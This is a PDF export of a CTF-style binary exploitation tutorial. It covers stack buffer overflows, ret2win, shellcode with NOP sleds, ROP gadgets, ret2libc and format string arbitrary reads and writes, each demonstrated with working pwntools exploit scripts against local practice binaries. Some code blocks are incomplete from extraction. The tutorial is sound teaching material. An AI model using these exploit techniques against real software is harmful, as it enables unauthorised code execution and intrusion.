Professional Documents
Culture Documents
Binary Exploitation
Binary Exploitation
Binary Exploitation
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 1/240
4/10/24, 12:28 PM Binary Exploitation
If you're looking for the binary exploitation notes, you're in the right place! Here I
make notes on most of the things I learn, and also provide vulnerable binaries to
allow you to have a go yourself. Most "common" stack techniques are mentioned
along with some super introductory heap; more will come soon™.
If you're looking for my maths notes, they are split up (with some overlap):
All my other maths notes can be found on Notion here. I realise having it in
multiple locations is annoying, but maths support in Notion is just wayyy better.
Like so much better. Sorry.
Hopefully these two get moulded into one soon
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd
actually be interested in seeing are likely my HackTheBox account or my Twitter (or X, if
you really prefer).
~ Andrej Ljubic
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 2/240
4/10/24, 12:28 PM Binary Exploitation
Types
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 3/240
4/10/24, 12:28 PM Binary Exploitation
Stack
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 4/240
4/10/24, 12:28 PM Binary Exploitation
Introduction
An introduction to binary exploitation
When a new function is called, a memory address in the calling function is pushed to
the stack - this way, the program knows where to return to once the called function
finishes execution. Let's look at a basic binary to show this.
Analysis
The binary has two files - source.c and vuln ; the latter is an ELF file, which is the
executable format for Linux (it is recommended to follow along with this with a Virtual
Machine of your own, preferably Linux).
We're gonna use a tool called radare2 to analyse the behaviour of the binary when
functions are called.
$ r2 -d -A vuln
The -d runs it while the -A performs analysis. We can disassemble main with
s main; pdf
s main seeks (moves) to main, while pdf stands for Print Disassembly Function
(literally just disassembles it).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 5/240
4/10/24, 12:28 PM Binary Exploitation
db 0x080491bb
db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply
somewhere which, when reached, pauses the program for you to run other commands.
Now we run dc for debug continue; this just carries on running the file.
It should break before unsafe is called; let's analyse the top of the stack now:
pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first
value here, which is 0xf7efe000 . This value is stored at the top of the stack, as ESP
points to the top of the stack - in this case, that is 0xff984af0 .
Note that the value 0xf7efe000 is random - it's an artefact of previous processes that
have used that part of the stack. The stack is never wiped, it's just marked as usable, so
before data actually gets put there the value is completely dependent on your system.
Let's move one more instruction with ds , debug step, and check the stack again. This
will execute the call sym.unsafe instruction.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 6/240
4/10/24, 12:28 PM Binary Exploitation
Huh, something's been pushed onto the top of the stack - the value 0x080491c0 . This
looks like it's in the binary - but where? Let's look back at the disassembly from before:
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
We can see that 0x080491c0 is the memory address of the instruction after the call to
unsafe . Why? This is how the program knows where to return to after unsafe() has
finished.
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this.
First, let's disassemble unsafe and break on the ret instruction; ret is the
equivalent of pop eip , which will get the saved return pointer we just analysed on the
stack into the eip register. Then let's continue and spam a bunch of characters into
the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as
we saw was 0xff984aec .
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in
us overwriting more of the stack than the developer expected. The saved return
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 7/240
4/10/24, 12:28 PM Binary Exploitation
pointer is also on the stack, meaning we managed to overwrite it. As a result, on the
ret , the value popped into eip won't be in the previous function but rather
0x41414141 . Let's check with ds .
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141 . Let's run dr eip to make sure that's the
value in eip :
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes
when we let it run with dc .
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2 is very useful and prints out the address that causes it to crash. If you cause
the program to crash outside of a debugger, it will usually say Segmentation Fault ,
which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when
making your program, usually using other C functions such as fgets() ; gets() is
intrinsically unsafe because it doesn't check the length of the input, meaning that the
presence of gets() is always something you should check out in a program. It is also
possible to give fgets() the wrong parameters, meaning it still takes in too many
characters.
Summary
When a function calls another function, it
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 8/240
4/10/24, 12:28 PM Binary Exploitation
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more
characters than the program expects, we can overwrite the value and redirect code
execution to wherever we wish. Functions such as fgets() can prevent such easy
overflow, but you should check how much is actually being read.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 9/240
4/10/24, 12:28 PM Binary Exploitation
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win() function (or equivalent); once you
successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a
predictable manner - we have to overwrite EIP, but to a specific value of our choice.
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped
into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
This can be found using simple trial and error; if we send a variable numbers of
characters, we can use the Segmentation Fault message, in combination with
radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute
force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger
to make sure the padding is correct.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 10/240
4/10/24, 12:28 PM Binary Exploitation
Now we need to find the address of the flag() function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
The final piece of the puzzle is to work out how we can send the address we want. If
you think back to the introduction, the A s that we sent became 0x41 - which is the
ASCII code of A . So the solution is simple - let's just find the characters with ascii
codes 0x08 , 0x04 , 0x91 and 0xc3 .
This is a lot simpler than you might think, because we can specify them in python as
hex:
address = '\x08\x04\x91\xc3'
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use
pwntools to interface with the binary (check out the pwntools posts for a more in-
depth look).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 11/240
4/10/24, 12:28 PM Binary Exploitation
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.sendline(payload)
If you run this, there is one small problem: it won't work. Why? Let's check with a
debugger. We'll put in a pause() to give us time to attach radare2 onto the process.
p = process('./vuln')
payload = b'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
Now let's run the script with python3 exploit.py and then open up a new terminal
window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of
unsafe() and read the value of the return pointer.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 12/240
4/10/24, 12:28 PM Binary Exploitation
[0x08049172]> db 0x080491aa
[0x08049172]> dc
0xc3910408 - look familiar? It's the address we were trying to send over, except the
bytes have been reversed, and the reason for this reversal is endianness. Big-endian
systems store the most significant byte (the byte with the largest value) at the
smallest memory address, and this is how we sent them. Little-endian does the
opposite (for a reason), and most binaries you will come across are little-endian. As far
as we're concerned, the byte are stored in reverse order in little-endian executables.
radare2 comes with a nice tool called rabin2 for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
The fix is simple - reverse the address (you can also remove the pause() )
payload += '\x08\x04\x91\xc3'[::-1]
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 13/240
4/10/24, 12:28 PM Binary Exploitation
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
Unsurprisingly, you're not the first person to have thought "could they possibly make
endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
The only caveat is that it returns bytes rather than a string, so you have to make the
padding a byte string:
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 14/240
4/10/24, 12:28 PM Binary Exploitation
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 15/240
4/10/24, 12:28 PM Binary Exploitation
De Bruijn Sequences
The better way to calculate offsets
Again, radare2 comes with a nice command-line tool (called ragg2 ) that can
generate it for us. Let's create a sequence of length 100 .
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2 when prompted for input, make
it crash and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141 ; we can use radare2 's in-built wopO
command to work out the offset.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 16/240
4/10/24, 12:28 PM Binary Exploitation
The backticks means the dr eip is calculated first, before the wopO is run on the
result of it.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 17/240
4/10/24, 12:28 PM Binary Exploitation
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win() function lying
around - shellcode is a way to run your own instructions, giving you the ability to run
arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary;
once we input it, we overwrite the return pointer to hijack code execution and point at
our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what
it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture
used in most computers today) does not differentiate between data and instructions -
it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore,
even though our input is data, the computer doesn't know that - and we can use that to
our advantage.
Disabling ASLR
Again, you should never run commands if you don't know what they do
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 18/240
4/10/24, 12:28 PM Binary Exploitation
Let's debug vuln() using radare2 and work out where in memory the buffer starts;
this is where we want to point the return pointer to.
$ r2 -d -A vuln
This value that gets printed out is a local variable - due to its size, it's fairly likely to be
the buffer. Let's set a breakpoint just after gets() and find the exact address.
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn
sequence as explained in the previous blog post.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 19/240
4/10/24, 12:28 PM Binary Exploitation
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
In order for the shellcode to be correct, we're going to set context.binary to our
binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us
with working shellcode.
context.binary = ELF('./vuln')
p = process()
We can use just process() because once context.binary is set it is assumed to use
that process
Yup, that's it. Now let's send it off and use p.interactive() , which enables us to
communicate to the shell.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 20/240
4/10/24, 12:28 PM Binary Exploitation
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an EOFError , print out the shellcode and try to find it in memory - the
stack address may be wrong
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 21/240
4/10/24, 12:28 PM Binary Exploitation
context.binary = ELF('./vuln')
p = process()
log.info(p.clean())
p.sendline(payload)
p.interactive()
Summary
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 22/240
4/10/24, 12:28 PM Binary Exploitation
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes
then very useful for shellcode exploits, because all they will do is run the next
instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of
them, it'll simply keep doing no instructions until it reaches our actual shellcode. This
allows us a greater margin of error as a shift of a few bytes forward or backwards won't
really affect it, it'll just run a different number of NOP instructions - which have the
same end result of running the shellcode. This padding with NOPs is often called a NOP
slide or NOP sled, since the EIP is essentially sliding down them.
The NOP instruction actually used to stand for XCHG EAX, EAX , which does effectively
nothing. You can read a bit more about it on this StackOverflow question.
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust
your previous exploit as the buffer location my be different.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 23/240
4/10/24, 12:28 PM Binary Exploitation
context.binary = ELF('./vuln')
p = process()
log.info(p.clean())
p.sendline(payload)
p.interactive()
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive
unexpected errors padding with NOPs but the shellcode worked before, try reducing the
length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90 in certain architectures, and if you need others you can
use pwntools:
nop = asm(shellcraft.nop())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 24/240
4/10/24, 12:28 PM Binary Exploitation
32- vs 64-bit
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing
you would need to change is switch out the p32() for p64() as the memory
addresses are longer.
The real difference between the two, however, is the way you pass parameters to
functions (which we'll be looking at much closer soon); in 32-bit, all parameters are
pushed to the stack before the function is called. In 64-bit, however, the first 6 are
stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling
convention. Note that different Operating Systems also have different calling
conventions.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 25/240
4/10/24, 12:28 PM Binary Exploitation
No eXecute
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their
own instructions into the program. The NX bit, which stands for No eXecute, defines
areas of memory as either instructions or data. This means that your input will be
stored as data, and any attempt to run it as instructions will crash the program,
effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-
Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 26/240
4/10/24, 12:28 PM Binary Exploitation
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the
binary itself in such a way to do what you wish. This often involves passing parameters
to functions already present within libc , such as system - if you can find the location
of a command, such as cat flag.txt , and then pass it as a parameter to system , it
will execute that command and return the output. A more dangerous command is
/bin/sh , which when run by system gives the attacker a shell much like the
shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call
functions, we first have to understand how to pass parameters to them.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 27/240
4/10/24, 12:28 PM Binary Exploitation
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
One Parameter
Source
Let's have a quick look at the source:
#include <stdio.h>
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 28/240
4/10/24, 12:28 PM Binary Exploitation
Analysing 32-bit
$ r2 -d -A vuln-32
$ s main; pdf
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push the parameter to the stack before calling the function. Let's break
on sym.vuln .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 29/240
4/10/24, 12:28 PM Binary Exploitation
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second,
however, is the parameter. This makes sense because the return pointer gets pushed
during the call , so it should be at the top of the stack. Now let's disassemble
sym.vuln .
Here I'm showing the full output of the command because a lot of it is relevant.
radare2 does a great job of detecting local variables - as you can see at the top, there
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 30/240
4/10/24, 12:28 PM Binary Exploitation
So now we know, when there's one parameter, it gets pushed to the stack so that the
stack looks like:
Analysing 64-bit
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in
the disassembly here it's edi , but edi is just the lower 32 bits of rdi , and the
parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again
we can check rdi with the command
dr rdi
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 31/240
4/10/24, 12:28 PM Binary Exploitation
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack
and in ROP is placed right after the function address
Multiple Parameters
Source
#include <stdio.h>
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
32-bit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 32/240
4/10/24, 12:28 PM Binary Exploitation
We've seen the full disassembly of an almost identical binary, so I'll only isolate the
important parts.
It's just as simple - push them in reverse order of how they're passed in. The reverse
order becomes helpful when you db sym.vuln and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
64-bit
So as well as rdi , we also push to rdx and rsi (or, in this case, their lower 32 bits).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 33/240
4/10/24, 12:28 PM Binary Exploitation
#include <stdio.h>
int main() {
vuln(0xdeadbeefc0dedd00d);
}
movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if
it's a mov .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 34/240
4/10/24, 12:28 PM Binary Exploitation
Gadgets
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret .
We can manipulate the ret of these gadgets in such a way as to string together a
large chain of them to do what we want.
Example
Let's for a minute pretend the stack looks like this during the execution of a
pop rdi; ret gadget.
What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the
stack during the pop rdi . Once the pop occurs, rsp moves:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 35/240
4/10/24, 12:28 PM Binary Exploitation
And since ret is equivalent to pop rip , 0x5655576724 gets moved into rip . Note
how the stack is laid out for this.
Utilising Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp .
Once that value is popped, it points at the next value at the stack - but wait. We can
overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop
0x100 into rdi then jump to flag() . Let's step-by-step the execution.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 36/240
4/10/24, 12:28 PM Binary Exploitation
On the original ret , which we overwrite the return pointer for, we pop the gadget
address in. Now rip moves to point to the gadget, and rsp moves to the next
memory address.
rsp moves to the 0x100 ; rip to the pop rdi . Now when we pop, 0x100 gets
moved into rdi .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 37/240
4/10/24, 12:28 PM Binary Exploitation
RSP moves onto the next items on the stack, the address of flag() . The ret is
executed and flag() is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values
afterwards (including the pop rip in ret ). If we want to pop 0x10 into rdi and
then jump to 0x16 , our payload would look like this:
Note if you have multiple pop instructions, you can just add more values.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 38/240
4/10/24, 12:28 PM Binary Exploitation
We use rdi as an example because, if you remember, that's the register for the first
parameter in 64-bit. This means control of this register using this gadget is important.
Finding Gadgets
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jm
[...]
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 39/240
4/10/24, 12:28 PM Binary Exploitation
exploiting_with_params.zip
5KB archive
32-bit
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return
address and the parameters.
Everything after the address of flag() will be part of the stack frame for the next
function as it is expected to be there - just instead of using push instructions we just
overwrote them manually.
p = process('./vuln-32')
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 40/240
4/10/24, 12:28 PM Binary Exploitation
64-bit
Same logic, except we have to utilise the gadgets we talked about previously to fill the
required registers (in this case rdi and rsi as we have two parameters).
p = process('./vuln-64')
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 41/240
4/10/24, 12:28 PM Binary Exploitation
ret2libc
The standard ROP exploit
A ret2libc is based off the system function found within the C library. This function
executes anything passed to it making it the best target. Another thing found within
libc is the string /bin/sh ; if you pass this string to system , it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system . Doesn't
sound too bad, right?
Disabling ASLR
To start with, we are going to disable ASLR. ASLR randomises the location of libc in
memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh . To understand the general theory, we will start with it disabled.
Manual Exploitation
Fortunately Linux has a command called ldd for dynamic linking. If we run it on our
compiled ELF file, it'll tell us the libraries it uses and their base addresses.
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 42/240
4/10/24, 12:28 PM Binary Exploitation
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem
- it just means you have a different libc version. Make sure you use your values.
To call system, we obviously need its location in memory. We can use the readelf
command for this.
The -s flag tells readelf to search for symbols, for example functions. Here we can
find the offset of system from libc base is 0x44f00 .
Since /bin/sh is just a string, we can use strings on the dynamic library we just
found with ldd . Note that when passing strings as parameters you need to pass a
pointer to the string, not the hex representation of the string, because that's how C
expects it.
-a tells it to scan the entire file; -t x tells it to output the offset in hex.
32-bit Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 43/240
4/10/24, 12:28 PM Binary Exploitation
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
p.clean()
p.sendline(payload)
p.interactive()
64-bit Exploit
Repeat the process with the libc linked to the 64-bit exploit (should be called
something like /lib/x86_64-linux-gnu/libc.so.6 ).
Note that instead of passing the parameter in after the return pointer, you will have to
use a pop rdi; ret gadget to put it into the RDI register.
[...]
0x00000000004011cb : pop rdi ; ret
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 44/240
4/10/24, 12:28 PM Binary Exploitation
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
p.clean()
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 45/240
4/10/24, 12:28 PM Binary Exploitation
# 32-bit
from pwn import *
p.clean()
p.sendline(payload)
p.interactive()
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them
here.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 46/240
4/10/24, 12:28 PM Binary Exploitation
Stack Alignment
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works
perfectly locally but fails remotely - or even fails when you try to use the provided LIBC
version rather than your local one. This arises due to something called stack alignment.
Essentially the x86-64 ABI (application binary interface) guarantees 16-byte alignment
on a call instruction. LIBC takes advantage of this and uses SSE data transfer
instructions to optimise execution; system in particular utilises instructions such as
movaps .
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 -
the ROP chain will fail on system .
The fix is simple - in your ROP chain, before the call to system , place a singular ret
gadget:
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
This works because it will cause RSP to be popped an additional time, pushing it
forward by 8 bytes and aligning it.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 47/240
4/10/24, 12:28 PM Binary Exploitation
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you
can leverage it to perform powerful actions such as reading from and writing to
arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifier" within strings. Let's look at an
example:
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d with the value, %f with the float value and %x with the hex
representation.
As expected, we get
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 48/240
4/10/24, 12:28 PM Binary Exploitation
What happens, however, if we don't have enough arguments for all the format
specifiers?
The key here is that printf expects as many parameters as format string specifiers,
and in 32-bit it grabs these parameters from the stack. If there aren't enough
parameters on the stack, it'll just grab the next values - essentially leaking values off
the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is
when C code takes user-provided input and prints it out using printf .
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 49/240
4/10/24, 12:28 PM Binary Exploitation
$ ./test
yes
yes
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
It reads values off the stack and returns them as the developer wasn't expecting so
many format string specifiers.
Choosing Offsets
The 1$ between tells printf to use the first parameter. However, this also means that
attackers can read values an arbitrary offset from the top of the stack - say we know
there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just
do %6$p . This allows us to be much more efficient.
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is
essentially a value that represents a memory address. So when you use the %s format
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 50/240
4/10/24, 12:28 PM Binary Exploitation
specifier, it's the pointer that gets passed to it. That means instead of reading a value
of the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to
correspond to where you want to read, that is. But what if we could specify where we
want to read? Well... we can.
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
You may notice that the last two values contain the hex values of %x . That's because
we're reading the buffer. Here it's at the 4th offset - if we can write an address then
point %s at it, we can get an arbitrary write!
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
As we can see, we're reading the value we inputted. Let's write a quick pwntools script
that write the location of the ELF file and reads it with %s - if all goes well, it should
read the first bytes of the file, which is always \x7fELF . Start with the basics:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 51/240
4/10/24, 12:28 PM Binary Exploitation
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
Nice it works. The base address of the binary is 0x8048000 , so let's replace the
0x41424344 with that and read it with %s :
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf stops at null bytes, and the very first
character is a null byte. We have to put the format specifier first.
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 52/240
4/10/24, 12:28 PM Binary Exploitation
We add 4 | because we want the address we write to fill one memory address, not
half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p . However,
memory addresses are 4 bytes long each and we already have 8 bytes, so it's two
memory addresses further along at %8$p .
$ python3 exploit.py
It still stops at the null byte, but that's not important because we get the output;
the address is still written to memory, just not printed back.
$ python3 exploit.py
Of course, %s will also stop at a null byte as strings in C are terminated with them. We
have worked out, however, that the first bytes of an ELF file up to a null byte are
\x7fELF\x01\x01\x01 .
Arbitrary Writes
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 53/240
4/10/24, 12:28 PM Binary Exploitation
Luckily there are other format string specifiers for that. I fully recommend you watch
this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth with the value 10. Format string
vulnerability is obvious, but there's also no buffer overflow due to a secure fgets .
As it's a global variable, it's within the binary itself. We can check the location using
readelf to check for symbols.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 54/240
4/10/24, 12:28 PM Binary Exploitation
We're lucky there's no null bytes, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 byt
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
Pwntools
As you can expect, pwntools has a handy feature for automating %n format string
exploits:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 55/240
4/10/24, 12:28 PM Binary Exploitation
